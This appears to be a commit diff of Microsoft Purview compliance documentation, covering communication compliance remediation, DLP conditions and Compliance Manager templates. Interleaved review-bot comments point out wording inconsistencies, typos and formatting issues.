+- **Escalate**: Use the **Escalate** button to choose other people in your organization who should review the message. Choose from a list of reviewers configured in the communication compliance policy to send an email notification requesting additional review of the message. The selected reviewer can use a link in the email notification to go directly to items escalated to them for review.
+- **Escalate for investigation**: Use the **Escalate for investigation** button to create a new [eDiscovery (Premium) case](/microsoft-365/compliance/overview-ediscovery-20) for single or multiple messages. Provide a name and notes for the new case. The custodian is automatically filled in for you. You don't need any additional permissions to manage the case. Creating a case doesn't resolve or create a new tag for the message. You can select a total of 100 messages when creating an eDiscovery (Premium) case during the remediation process. Messages in all communication channels included in communication compliance are supported. For example, you could select 50 Microsoft Teams chats, 25 Exchange Online email messages, and 25 Yammer messages when you open a new eDiscovery (Premium) case for a user.
+- **Remove message in Teams**: Use the **Remove message in Teams** button to block potentially inappropriate messages and content identified in messages from Microsoft Teams channels and 1:1 and group chats. This includes Teams chat messages reported by users and chat messages detected using machine-learning and classifier-based communication compliance policies. Removed messages and content are replaced with a policy tip that explains that it's blocked and the policy that applies to its removal from view. Recipients are provided a link in the policy tip to learn more about the applicable policy and the review process. The sender receives a policy tip for the blocked message and content but can review the details of the blocked message and content for context regarding the removal.
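Review bot: the new Escalate for investigation bullet moves the product name backwards: the removed line reads "25 Viva Engage messages" and the added line reads "25 Yammer messages"; confirm this is intended. The same bullet also drops a fact the old text stated, that the user who sent the matching message becomes the case custodian; "The custodian is automatically filled in for you" no longer tells the reader who that will be, which matters when deciding whether to open a case on someone. In the Report as misclassified bullet, "the message was incorrectly generated by the alerting process" does not fit after the rename: the message was sent by a user, what the process generated is the policy match, so "the policy match was incorrectly generated" reads correctly. In the Remove message in Teams bullet, "content identified in messages from Microsoft Teams" replaced "identified in alerts" and now reads as "messages ... identified in messages"; "identified by policy matches in Microsoft Teams channels" keeps the meaning. Both the removed and the added misclassified lines carry "canΓÇÖt", so check that the apostrophe in the source file is a plain ASCII one rather than a curly quote the renderer mangles.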
### Step 4: Determine if message details should be archived outside of communication compliance
-Message details can be exported or downloaded if you need to archive the messages in a separate storage solution. Selecting the **Download** control automatically adds selected messages to a .ZIP file that can be saved to storage outside of Microsoft 365.
+Message details can be exported or downloaded if you need to archive the messages in a separate storage solution. Selecting the **Download** button automatically adds selected messages to a .ZIP file that can be saved to storage outside of Microsoft 365.
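Review bot: this paragraph says the .ZIP "can be saved to storage outside of Microsoft 365" but nothing about what the archive contains or what follows from taking it out of the service; one sentence noting that the export carries the message content and attachments and that access to the archive is then the reader's responsibility, not something communication compliance controls, would help readers choose where to put it.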
### Step 5: Consider Power Automate flows
The following Power Automate template is provided to customers to support proces
#### Create a Power Automate flow
-To create a Power Automate flow from a recommended default template, you'll use the **Manage Power Automate flows** option from the **Automate** control when working directly in an alert. To create a Power Automate flow with **Manage Power Automate flows**, you must be a member of at least one communication compliance role group.
+To create a Power Automate flow from a recommended default template, you'll use the **Manage Power Automate flows** option from the **Automate** button when working directly in an alert. To create a Power Automate flow with **Manage Power Automate flows**, you must be a member of at least one communication compliance role group.
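Review bot: "when working directly in an alert" is kept here, and again in the later Share, Edit and Delete paragraphs of this section and in "communication compliance alerts" at the end of step 9, while Step 3 of this same commit replaced "alert" with "message" throughout; either rename these too or state once that a message with a policy match is also referred to as an alert.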
Follow these steps to create a Power Automate flow from a default template:
3. Select **Power Automate** from the alert action menu. 4. On the **Power Automate** page, select a default template from the **Communication compliance templates you may like** section on the page. 5. The flow lists the embedded connections needed for the flow and displays if the connection statuses are available. If needed, update any connections that aren't displayed as available. Select **Continue**.
-6. By default, the recommended flows are pre-configured with the recommended communication compliance and Microsoft 365 service data fields required to complete the assigned task for the flow. If needed, customize the flow components by using the **Show advanced options** control and configuring the available properties for the flow component.
+6. By default, the recommended flows are pre-configured with the recommended communication compliance and Microsoft 365 service data fields required to complete the assigned task for the flow. If needed, customize the flow components by using the **Show advanced options** button and configuring the available properties for the flow component.
7. If needed, add any additional steps to the flow by selecting the **New step** button. In most cases, this change shouldn't be needed for the recommended default templates. 8. Select **Save draft** to save the flow for further configuration later, or select **Save** to complete the configuration for the flow.
-9. Select **Close** to return to the Power Automate flow page. The new template will be listed as a flow on the **My flows** tab and is automatically available from the Power Automate control for the user that created the flow when working with communication compliance alerts.
+9. Select **Close** to return to the Power Automate flow page. The new template will be listed as a flow on the **My flows** tab and is automatically available from the Power Automate button for the user that created the flow when working with communication compliance alerts.
#### Share a Power Automate flow
-By default, Power Automate flows created by a user are only available to that user. For other communication compliance users to have access and use a flow, the flow must be shared by the flow creator. To share a flow, use the **Power Automate** control when working directly in an alert.
+By default, Power Automate flows created by a user are only available to that user. For other communication compliance users to have access and use a flow, the flow must be shared by the flow creator. To share a flow, use the **Power Automate** button when working directly in an alert.
To share a Power Automate flow, you must be a member of at least one communication compliance role group.
Follow these steps to share a Power Automate flow:
#### Edit a Power Automate flow
-If you need to edit a flow, you'll use the **Power Automate** control when working directly in an alert. To edit a Power Automate flow, you must be a member of at least one communication compliance role group.
+If you need to edit a flow, you'll use the **Power Automate** button when working directly in an alert. To edit a Power Automate flow, you must be a member of at least one communication compliance role group.
Follow these steps to edit a Power Automate flow:
#### Delete a Power Automate flow
-If you need to delete a flow, use the **Power Automate** control when working directly in an alert. To delete a Power Automate flow, you must be a member of at least one communication compliance role group.
+If you need to delete a flow, use the **Power Automate** button when working directly in an alert. To delete a Power Automate flow, you must be a member of at least one communication compliance role group.
Follow these steps to delete a Power Automate flow:
Notices templates are custom email templates where you can define the following
|**Field**|**Required**| **Details** | |:--|:--|:--| |**Template name** | Yes | Friendly name for the notice template that you'll select in the notify workflow during remediation, supports text characters. |
-| **Sender address** | Yes | Address of one or more users or groups that send the message to the user with a policy match, selected from the Active Directory for your subscription. |
+| **Sender address** | Yes | Address of one or more users or groups that sent the message to the user with a policy match, selected from the Active Directory for your subscription. |
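Review bot: the tense change in this row inverts its meaning. "users or groups that sent the message to the user with a policy match" now describes whoever sent the matching message, but the field is the address the notice is sent from, as the removed line "that send the message to the user with a policy match" said; restore "send" or, clearer still, "Address of the user or group the notice is sent from, selected from the Active Directory for your subscription."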
| **CC and BCC addresses** | No | Optional users or groups to be notified of the policy match, selected from the Active Directory for your subscription. | | **Subject** | Yes | Information that appears in the subject line of the message, supports text characters. | | **Message body** | Yes | Information that appears in the message body, supports text or HTML values. |
If you'd like to create more than a simple text-based email message for notifica
## Unresolve messages
-When messages are resolved, they're removed from the **Pending** tab view and displayed in the **Resolved** tab. Investigation and remediation actions aren't available for messages in the *Resolved* view. However, there may be instances where you need to take additional action on a message that was mistakenly resolved or that needs further investigation after initial resolution. You can use the unresolve command feature move one or more messages from the *Resolved* view back to the *Pending* view.
+When messages are resolved, they're removed from the **Pending** tab and displayed in the **Resolved** tab. Investigation and remediation actions aren't available for messages in the *Resolved* tab. However, there may be instances where you need to take additional action on a message that was mistakenly resolved or that needs further investigation after initial resolution. You can use the **Unresolve** command to move one or more messages from the **Resolved** tab back to the **Pending** tab.
-Follow these steps to unresolve messages:
+To unresolve a message:
1. Sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for a user assigned to the *Communication Compliance Analysts* or *Communication Compliance Investigators* role groups in your Microsoft 365 organization. 2. In the Microsoft Purview compliance portal, go to **Communication compliance**.
-3. Select the **Policies** tab and then select a policy that contains the resolved alert message, double-click to open the **Policy** page.
+3. Select the **Policies** tab, select a policy that contains the resolved message, and then double-click to open the **Policy** page.
4. On the **Policy** page, select the **Resolved** tab.
-5. On the **Resolved** tab, select one or more messages to move back to *Pending*.
-6. On the command bar, select **Unresolve**.
-7. On the **Unresolve item** pane, add any comments applicable to the unresolve action and select **Save** to move the item back to *Pending*.
+5. On the **Resolved** tab, select one or more messages.
+6. Select **Unresolve**.
+7. On the **Unresolve item** pane, add any applicable comments, and then select **Save**.
8. Select the **Pending** tab to verify the selected items are displayed.
compliance Communication Compliance Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-policies.md
f1.keywords:
Previously updated : 06/20/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:
When configured for an insider risk management policy, a dedicated policy named
Users that send 5 or more messages classified as potentially risky within 24 hours are automatically brought in-scope for insider risk management policies that include this option. Once in-scope, the insider risk management policy detects potentially risky activities configured in the policy and generates alerts as applicable. It may take up to 48 hours from the time risky messages are sent until the time a user is brought in-scope in an insider risk management policy. If an alert is generated for a potentially risky activity detected by the insider risk management policy, the triggering event for the alert is identified as being sourced from the communication compliance risky activity.
-All users assigned to the [Insider Risk Management Investigators](/microsoft-365/compliance/insider-risk-management-plan#plan-for-the-review-and-investigation-workflow) role group are automatically assigned as reviewers in the dedicated communication compliance policy. If inside risk management investigators need to review the associated risky user alert directly on the communication compliance alerts page (linked from the insider risk management alert details), they must be manually added to the *Communication Compliance Investigators* role group.
+All users assigned to the [Insider Risk Management Investigators](/microsoft-365/compliance/insider-risk-management-plan#plan-for-the-review-and-investigation-workflow) role group are automatically assigned as reviewers in the dedicated communication compliance policy. If insider risk management investigators need to review the associated risky user alert directly on the communication compliance alerts page (linked from the insider risk management alert details), they must be manually added to the *Communication Compliance Investigators* role group.
Before integrating communication compliance with insider risk management, you should also consider the following guidance when detecting messages containing potentially inappropriate text:
You have the option of including sensitive information types as part of your com
- Custom information type > [!IMPORTANT]
-> SITs have two different ways of defining the max unique instance count parameters. To learn more, see [Instance count supported values for SIT](/microsoft-365/compliance/create-a-custom-sensitive-information-type#instance-count-supported-values-for-sit).
+> Sensitive info types have two different ways of defining the max unique instance count parameters. To learn more, see [Create custom sensitive information types](/microsoft-365/compliance/create-a-custom-sensitive-information-type#instance-count-supported-values-for-sit).
-To learn more about sensitive information details and the patterns included in the default types, see [Sensitive information type entity definitions](/microsoft-365/compliance/sensitive-information-type-entity-definitions).
+The communication compliance solution supports default sensitive information types as well as bundled named-entity sensitive information types, which are collections of sensitive information types. To learn more about sensitive information details and the patterns included in the default types, see [Sensitive information type entity definitions](/microsoft-365/compliance/sensitive-information-type-entity-definitions). For information on supported bundled named-entity sensitive information types, see the following:
+
+- [All credentials](sit-defn-all-creds.md)
+- [All full names](sit-defn-all-full-names.md)
+- [All medical terms and conditions](sit-defn-all-medical-terms-conditions.md)
+- [All Physical Addresses](sit-defn-all-physical-addresses.md)
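Review bot: the four new bullet links use bare relative paths ("sit-defn-all-creds.md") while every other link in this file uses the root-relative "/microsoft-365/compliance/..." form; they resolve only if those files sit in the same folder as communication-compliance-policies.md, so check that or switch to the form the rest of the page uses. Also "All Physical Addresses" is title-cased unlike the other three entries, and the IMPORTANT note now says "Sensitive info types" while the surrounding text says "sensitive information types".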
### Custom keyword dictionaries
Images from 50 KB to 4 MB in the following image formats are scanned and process
> [!NOTE] > Scanning and extraction for embedded and attached .pdf images is currently supported only for email messages.
-When reviewing pending alerts for policies with OCR enabled, images identified and matched to policy conditions are displayed as child items for associated alerts. You can view the original image to evaluate the identified text in context with the original message. It may take up to 48 hours for detected images to be available with alerts.
+When reviewing pending policy matches for policies with OCR enabled, images identified and matched to policy conditions are displayed as child items for associated alerts. You can view the original image to evaluate the identified text in context with the original message. It may take up to 48 hours for detected images to be available with alerts.
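Review bot: the added line changes "pending alerts" to "pending policy matches" but keeps "child items for associated alerts" and "available with alerts" in the same sentence and the next, so the rename stops halfway; use one term for the whole paragraph.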
### Conditional settings
The following table explains more about each condition.
|:--|:--| | **Content matches any of these classifiers** | Apply to the policy when any classifiers are included or excluded in a message. Some classifiers are pre-defined in your organization, and custom classifiers must be configured separately before they're available for this condition. Only one classifier can be defined as a condition in a policy. For more information about configuring classifiers, see [Learn about trainable classifiers](/microsoft-365/compliance/classifier-learn-about). | | **Content contains any of these sensitive info types** | Apply to the policy when any sensitive information types are included or excluded in a message. Some classifiers are pre-defined in your tenant, and custom classifiers can be configured separately or as part of the condition assignment process. Each sensitive information type you choose is applied separately and only one of these sensitive information types must apply for the policy to apply to the message. For more information about custom sensitive information types, see [Learn about sensitive information types](/microsoft-365/compliance/sensitive-information-type-learn-about). |
-| **Message is received from any of these domains** <br><br> **Message is not received from any of these domains** | Apply the policy to include or exclude specific domains in received messages.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>-Enter each domain and separate multiple domains with a comma.<br> -Do not include spaces between items separated by a comma.<br> -Remove all leading and trailing spaces.<br><br> Each domain entered is applied separately, only one domain must apply for the policy to apply to the message. If you want to use **Message is received from any of these domains** to look for messages from specific emails address you need to combine this with another condition like **Message contains any of these words** or **Content matches any of these classifiers** or you might get unexpected results. <br><br> If you want to scan all email from a specific domain, but want to exclude messages that don't need review (newsletters, announcements, and so on), you must configure a **Message is not received from any of these domains** condition that excludes the email address (example newsletter@contoso.com). |
+| **Message is received from any of these domains** <br><br> **Message is not received from any of these domains** | Apply the policy to include or exclude specific domains in received messages.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>-Enter each domain and separate multiple domains with a comma.<br> -Do not include spaces between items separated by a comma.<br> -Remove all leading and trailing spaces.<br><br> Each domain entered is applied separately, only one domain must apply for the policy to apply to the message. If you want to use **Message is received from any of these domains** to look for messages from specific domains, you need to combine this with another condition like **Message contains any of these words** or **Content matches any of these classifiers** or you might get unexpected results. <br><br> If you want to scan all emails but want to exclude messages from a specific domain that don't need review (newsletters, announcements, and so on), you must configure a **Message is not received from any of these domains** condition that excludes the domain (example 'contoso.com,wingtiptoys.com'). |
+| **Message is received from any of these external email addresses** <br><br> **Message is not received from any of these external email addresses**|Apply the policy to include or exclude messages received or not received from specific external email addresses (example someone@outlook.com).<br><br>Use this condition to monitor only messages that come from outside the organization (messages that cross the firewall). |
+| **Message is sent to any of these external email addresses** <br><br> **Message is not sent to any of these external email addresses**|Apply the policy to include or exclude messages sent or not sent to specific external email addresses (example someone@outlook.com).<br><br>Use this condition to monitor only messages that are sent outside the organization (messages that cross the firewall).|
| **Message is sent to any of these domains** <br><br> **Message is not sent to any of these domains** | Apply the policy to include or exclude specific domains in sent messages.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>-Enter each domain and separate multiple domains with a comma.<br> -Do not include spaces between items separated by a comma.<br> -Remove all leading and trailing spaces.<br><br>Each domain is applied separately; only one domain must apply for the policy to apply to the message. <br><br> If you want to exclude all emails sent to two specific domains, configure the **Message is not sent to any of these domains** condition with the two domains (example 'contoso.com,wingtiptoys.com'). | | **Message is classified with any of these labels** <br><br> **Message is not classified with any of these labels** | To apply the policy when certain retention labels are included or excluded in a message. Retention labels must be configured separately and configured labels are chosen as part of this condition. Each label you choose is applied separately (only one of these labels must apply for the policy to apply to the message). For more information about retention labels, see [Learn about retention policies and retention labels](/microsoft-365/compliance/retention).| | **Message contains any of these words** <br><br> **Message contains none of these words** | To apply the policy when certain words or phrases are included or excluded in a message.<br><br> Make sure to use the following syntax when entering conditional text: <br><br>- Remove all leading and trailing spaces.<br>- Add quotation marks before and after each keyword or key phrase.<br>- Separate each keyword or key phrase with a comma.<br>- Do not include spaces between items separated by a comma. 
<br><br>**Example:** "banker","insider trading","confidential 123"<br><br>Each word or phrase you enter is applied separately (only one word must apply for the policy to apply to the message). For more information about entering words or phrases, see the next section [Matching words and phrases to emails or attachments](#matching-words-and-phrases-to-emails-or-attachments).|
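Review bot: the new "Message is sent to any of these external email addresses" row gives no entry syntax, while the neighbouring domains and words rows spell theirs out (comma-separated, no spaces between items, no leading or trailing spaces); add the same guidance to the new row, e.g. "Enter each address and separate multiple addresses with a comma; do not include spaces." It should also state, as the domains row does, that each address is applied separately and only one has to match for the policy to apply, so reviewers know whether a multi-address condition is AND or OR.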
compliance Communication Compliance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance.md
f1.keywords:
Previously updated : 04/17/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:
Intelligent customizable templates in communication compliance allow you to appl
Built-in remediation workflows allow you to quickly identify and take action on messages with policy matches in your organization. The following new features increase efficiency for investigation and remediation activities: - **Flexible remediation workflow**: New remediation workflow helps you quickly take action on policy matches, including new options to escalate messages to other reviewers and to send email notifications to users with policy matches.-- **Conversation policy matching**: Messages in conversations are grouped by policy matches to give you more visibility about how conversations relate to your communication policies. For example, conversation policy matching in the *Pending Alerts* view will automatically show all messages in a Teams channel that have matches for your communications policies for analyzing and mitigating potentially inappropriate messages. Other messages in conversations that don't match your communications policies wouldn't be displayed.
+- **Conversation policy matching**: Messages in conversations are grouped by policy matches to give you more visibility about how conversations relate to your communication policies. For example, conversation policy matching in the **Pending** tab will automatically show all messages in a Teams channel that have matches for your communications policies for analyzing and mitigating potentially inappropriate messages. Other messages in conversations that don't match your communications policies wouldn't be displayed.
- **Keyword highlighting**: Terms matching policy conditions are highlighted in the message text view to help reviewers quickly analyze and remediate policy alerts. - **Optical character recognition (OCR)**: Check, detect, and investigate printed and handwritten text within images embedded or attached to email or Microsoft Teams chat messages. - **New filters**: Investigate and remediate policy alerts faster with message filters for several fields, including sender, recipient, date, domains, and many more.
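Review bot: the rewritten "Conversation policy matching" bullet uses both "communication policies" and "communications policies" in the same sentence; pick one term. "Other messages in conversations that don't match your communications policies wouldn't be displayed" should be "aren't displayed", matching the present tense of the rest of the bullet.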
You can choose from the following policy templates in the Microsoft Purview comp
In this step, you can look deeper into the issues detected as matching your communication compliance policies. This step includes the following actions available in the Microsoft Purview compliance portal: -- **Alerts**: When a message matches a policy condition, an alert is automatically generated. For each alert, you can see the status, the severity, the time detected, and if an eDiscovery (Premium) case is assigned and its status. New alerts are displayed on the communication compliance home page and the **Alerts** page and are listed in order of severity.
+- **Alerts**: When a group of messages matches a policy condition, an alert is automatically generated. For each alert, you can see the status, the severity, the time detected, and if an eDiscovery (Premium) case is assigned and its status. New alerts are displayed on the communication compliance home page and the **Alerts** page and are listed in order of severity.
- **Issue management**: For each alert, you can take investigative actions to help remediate the issue detected in the message. - **Document review**: During the investigation of an issue, you can use several views of the message to help properly evaluate the detected issue. The views include a conversation summary, text-only, and detail views of the communication conversation. - **Reviewing user activity history**: View the history of user message activities and remediation actions, such as past notifications and escalations, for policy matches.
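Review bot: changing "When a message matches a policy condition" to "When a group of messages matches" leaves the rest of this list inconsistent, since "Issue management" still says "remediate the issue detected in the message" (singular). Say what the group is (for example, the messages of one conversation that matched the policy, as the conversation policy matching description implies) or how messages are grouped into a single alert; otherwise a reader cannot tell whether one alert maps to one message or to many.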
In this step, you can look deeper into the issues detected as matching your comm
The next step is to remediate communication compliance issues you've investigated using the following options: -- **Resolve**: After reviewing an issue, you can remediate by resolving the alert. Resolving an alert removes it from the pending alert queue, and the action is preserved as an entry in the *Resolved queue* for the matching policy. Alerts are automatically resolved after marking the alert as misclassified, sending a notice to a user about the alert, or opening a new case for the alert.
+- **Resolve**: After reviewing an issue, you can remediate by resolving the alert. Resolving an alert removes it from the **Pending** tab, and the action is preserved as an entry on the **Resolved** tab for the matching policy. Alerts are automatically resolved after marking the alert as misclassified, sending a notice to a user about the alert, or opening a new case for the alert.
- **Tag a message**: As part of the resolution of an issue, you can tag the detected message as compliant, non-compliant, or as questionable as it relates to the policies and standards for your organization. Tagging can help you micro-filter policy alerts for escalations or as part of other internal review processes. - **Notify the user**: Often, users accidentally or inadvertently violate a communication compliance policy. You can use the notify feature to provide a warning notice to the user and to resolve the issue. - **Escalate to another reviewer**: Sometimes, the initial reviewer of an issue needs input from other reviewers to help resolve the incident. You can easily escalate message issues to reviewers in other areas of your organization as part of the resolution process.
compliance Compliance Manager Templates List https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-templates-list.md
f1.keywords:
Previously updated : 05/04/2023 Last updated : 07/18/2023 audience: Admin
The regulatory templates listed below may be purchased by your organization. Cer
- [CIS Implementation Group 1, Group 2, Group 3](/compliance/regulatory/offering-cis-benchmark) - CIS Microsoft 365 Foundation Level 1 and 2 - [Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM)](/compliance/regulatory/offering-csa-star-attestation)-- COBIT 5
+- COBIT 5
- FINRA Cybersecurity Checklist - ITU X.1052 Information Security Management Framework - Joint Commission Information Management Standard
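Review bot: the removed and added "COBIT 5" lines are textually identical, so this is a whitespace or line-ending change only; confirm it is intentional (trailing-space cleanup, for instance) rather than an accidental re-save, because it adds diff noise without content.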
The regulatory templates listed below may be purchased by your organization. Cer
- Bosnia and Herzegovina Law on the Protection of Personal Data - Botswana - Data Protection Act - Bulgaria Law for Protection of Personal Data 2002 -- Central Bank of Kuwait Cybersecurity Framework
+- Central Bank of Kuwait Cybersecurity Framework
+- Corporate Sustainability Reporting Directive (CSRD)
- Cyprus The Processing of Personal Data Law - Czech - Act No. 110/2019 Coll. on Personal Data Processing - 2019 - Czech - On Cyber Security and Change of Related Acts (Act on Cyber Security) - Act No. 181
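Review bot: the new "Corporate Sustainability Reporting Directive (CSRD)" entry sits in the correct alphabetical slot between "Central Bank of Kuwait" and "Cyprus". The "Central Bank of Kuwait Cybersecurity Framework" -/+ pair is identical, so that part of the hunk is a whitespace-only change; keep it if it is deliberate cleanup, otherwise drop it to keep the diff minimal.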
The regulatory templates listed below may be purchased by your organization. Cer
- Estonia - Personal Data Protection Act - Estonia - The system of security measures for information systems - EU - Directive 2006/24/EC -- EU - ePrivacy Directive 2002 58 EC
+- EU - ePrivacy Directive 2002 58 EC
+- [EU GDPR (General Data Protection Regulation)](/compliance/regulatory/gdpr)
- EudraLex - The Rules Governing Medicinal Products in the European Union - European Network and Information Security Agency (ENISA) - Cloud Computing Information Assurance Framework - Finland - Data Protection Act
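Review bot: the re-added "EU - ePrivacy Directive 2002 58 EC" line keeps the directive number without separators while the line above writes "Directive 2006/24/EC"; use the same form, "Directive 2002/58/EC". The new GDPR entry is a link where the surrounding entries are plain text, which is fine if only templates with a regulatory offering page get links, but that convention is not stated anywhere in the list.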
compliance Compliance Manager Whats New https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-whats-new.md
f1.keywords:
Previously updated : 05/23/2023 Last updated : 07/18/2023 audience: Admin
description: "Find out whatΓÇÖs new in Compliance Manger and whatΓÇÖs to come. R
[!INCLUDE [purview-preview](../includes/purview-preview.md)]
+## June 2023
+
+Compliance Manager has published the following new regulatory template:
+
+- Corporate Sustainability Reporting Directive (CSRD)
+
+View our [full list of regulatory templates](compliance-manager-templates-list.md).
+ ## May 2023 Compliance Manager now integrates with Microsoft Defender for Cloud so you can assess your compliance posture across Microsoft 365, Microsoft Azure, Google Cloud Platform (GCP), and Amazon Web Services (AWS) with resource-level testing and cloud-specific guidance. This new integration provides customers with a single interface in Compliance Manager to help make it easier to manage compliance across the organizationΓÇÖs digital estate. Learn more about [multicloud support in Compliance Manager](compliance-manager-multicloud.md).
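Review bot: the added June 2023 section is consistent with the templates list, but the existing "## May 2023" heading now appears run into the paragraph that follows it; make sure the blank line after the heading survives so it still renders as a heading. While in this file, the front-matter description still carries mojibake ("whatΓÇÖs") and the typo "Compliance Manger"; both should be corrected.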
compliance Data Classification Activity Explorer Available Events https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-classification-activity-explorer-available-events.md
This event is generated each time an unlabeled document is labeled or an email i
|Source |Reported in Activity explorer | Note | |||| | Word, Excel, PowerPoint|Yes |
-|Outlook| Yes | |
+|Outlook| Yes | If a sensitivity label has been applied to any email in an email thread, the same label will be automatically applied to subsequent replies on the thread. These labeling events appear in activity explorer as automatic labeling events, even when automatic labeling has not ben configured.|
|SharePoint online, OneDrive|Yes | | |Exchange |Yes | | |Azure Information Protection (AIP) unified client and AIP unified scanner |Yes |The AIP *new label* action is mapped to *label applied* in Activity explorer |
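Review bot: typo in the new Outlook note, "has not ben configured" should be "has not been configured". The note itself is useful for anyone triaging activity explorer data, since it explains why automatic labeling events appear without an auto-labeling policy; consider saying explicitly that such events come from label inheritance on the thread and do not indicate that an auto-labeling policy fired.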
compliance Dlp Exchange Conditions And Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-exchange-conditions-and-actions.md
To configure the sender address location at a DLP rule level, the parameter is *
|Subject contains words or phrases|condition: *SubjectContainsWords* <br/> exception: *ExceptIf SubjectContainsWords*|Words|Messages that have the specified words in the Subject field.| |Subject matches patterns|condition: *SubjectMatchesPatterns* <br/> exception: *ExceptIf SubjectMatchesPatterns*|Patterns|Messages where the Subject field contain text patterns that match the specified regular expressions.| |Content contains|condition: *ContentContainsSensitiveInformation* <br/> exception *ExceptIfContentContainsSensitiveInformation*|SensitiveInformationTypes|Messages or documents that contain sensitive information as defined by Microsoft Purview Data Loss Prevention (DLP) policies.|
+|Content is not labeled|condition: *ContentIsNotLabeled* <br/> exception *ExceptIfContentIsNotLabeled*|Sensitivity Labels|Messages where neither the email nor the attached documents contain any sensitivity labels as defined by Microsoft Purview Data Loss Prevention (DLP) policies.|
|Subject or Body matches pattern|condition: *SubjectOrBodyMatchesPatterns* <br/> exception: *ExceptIfSubjectOrBodyMatchesPatterns*|Patterns|Messages where the subject field or message body contains text patterns that match the specified regular expressions.| |Subject or Body contains words|condition: *SubjectOrBodyContainsWords* <br/> exception: *ExceptIfSubjectOrBodyContainsWords*|Words|Messages that have the specified words in the subject field or message body|
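Review bot: the description of the new "Content is not labeled" row ends with "as defined by Microsoft Purview Data Loss Prevention (DLP) policies", which is copied verbatim from the "Content contains" row above, where it qualifies sensitive information types; for a sensitivity-label condition it reads oddly. Suggest "Messages where neither the email nor any attached document has a sensitivity label applied." Also, "exception *ExceptIfContentIsNotLabeled*" lacks the colon that the Subject rows use after "exception"; the table is inconsistent on this, so align the new row with the majority form "exception: *...*".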
compliance Dlp Spo Odbweb Policy Tips https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-spo-odbweb-policy-tips.md
f1.keywords:
Previously updated : 06/26/2023 Last updated : 07/18/2023 audience: Admin search.appverid: MET150
Yes.
> [!IMPORTANT] > When emails are encrypted with Microsoft Purview Message Encryption and the policy used to detect them uses the detect encryption condition policy tips will not appear.
+For more information on blocking and notifications in SharePoint Online and OneDrive for Business, see [Blocking and notifications in SharePoint Online and OneDrive for Business](dlp-policy-reference.md#blocking-and-notifications-in-sharepoint-online-and-onedrive-for-business).
+ ## Conditions that support policy tips in SharePoint Online and OneDrive for Business web client - Content contains
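Review bot: the added cross-link to the blocking and notifications section is fine, but the "## Conditions that support policy tips..." heading that follows must stay on its own line with a blank line before it; as shown here it is joined to the added blank line. The IMPORTANT note just above also needs a comma to be parseable: "uses the detect encryption condition, policy tips will not appear".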
Yes.
## Actions that support policy tips in SharePoint Online and OneDrive for Business web client -- Restrict acces or encrypt the ocntent in Microsoft 365 locations
+- Restrict acces or encrypt the content in Microsoft 365 locations
## Sensitive information types that support policy tips in SharePoint Online and OneDrive for Business web client
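Review bot: the `+` line fixes "ocntent" but leaves "acces" misspelled; the bullet should read "Restrict access or encrypt the content in Microsoft 365 locations".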
compliance Endpoint Dlp Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-learn-about.md
f1.keywords:
Previously updated : 06/24/2023 Last updated : 07/18/2023 audience: ITPro f1_keywords:
Endpoint DLP enables you to audit and manage the following types of activities u
|Activity |Description |Windows 10 1809 and later/ Windows 11| macOS three latest released versions | Auditable/restrictable| |||||| |Upload to cloud service, or access by unallowed browsers | Detects when a user attempts to upload an item to a restricted service domain or access an item through a browser. If they're using a browser that is listed in DLP as unallowed, the upload activity is blocked and the user is redirected to use Microsoft Edge. Microsoft Edge then either allows or blocks the upload or access based on the DLP policy configuration. You can block, warn, or audit when protected files are allowed to be uploaded or prevented from being uploaded to cloud services based on the allow/unallowed domains list in Global settings. When the configured action is set to warn or block, other browsers (defined on the unallowed browsers list under Global settings) are blocked from accessing the file. |Supported |Supported|Auditable and restrictable|
-|Copy to another app |Detects when a user attempts to copy information from a protected item and then paste it into another app, process, or item. It also detects when a user copies and pastes content among files within the same app, process, or item for Word, Excel, and PowerPoint.|Supported|Supported | Auditable and restrictable|
|Copy to USB removable media |When this activity is detected, you can block, warn, or audit the copying or moving of protected files from an endpoint device to USB removable media.|Supported|Supported |Auditable and restrictable| |Copy to a network share | When this activity is detected, you can block, warn, or audit the copying or moving of protected files from an endpoint device to any network share. |Supported|Supported |Auditable and restrictable| |Print a document |When this activity is detected, you can block, warn, or audit the printing of protected files from an endpoint device. |Supported|Supported|Auditable and restrictable |
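Review bot: the "Copy to another app" row is removed without a replacement in this hunk, so the intra-app copy/paste behavior for Word, Excel and PowerPoint that it described is no longer documented here; if that activity is now covered by the "Copy to clipboard" row, say so in the commit message or leave a one-line note in the table, otherwise readers of the previous version will look for the activity and not find it.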
Endpoint DLP enables you to audit and manage the following types of activities u
|Copy to a Bluetooth device|Detects when a user attempts to copy an item to an unallowed Bluetooth app (as defined in the list of unallowed Bluetooth aps in Endpoint DLP settings).|Supported|Supported (preview)| Auditable and restrictable| |Create an item|Detects the creation of an item.|Supported |Supported |Auditable| |Rename an item|Detects the renaming of an item.|Supported |Supported |Auditable|
-|Copy to clipboard| When this activity is detected, you can block, warn, or audit the copying of protected files to a clipboard on an endpoint device. |Supported | Supported|Auditable and restrictable|
+|Copy to clipboard| When this activity is detected, you can block, block with override, or audit the copying of protected files to a clipboard on an endpoint device. If the rule is configure to **Block** or **Block with override** copying is blocked when the source content is sensitive except when the destination is within the same Microsoft 365 Office app|Supported | Supported|Auditable and restrictable|
|Access by unallowed apps| Detects when an application that is on the unallowed apps list (as defined in [restricted apps and app groups](dlp-configure-endpoint-settings.md)) attempts to access protected files on an endpoint device. |Supported |Supported|
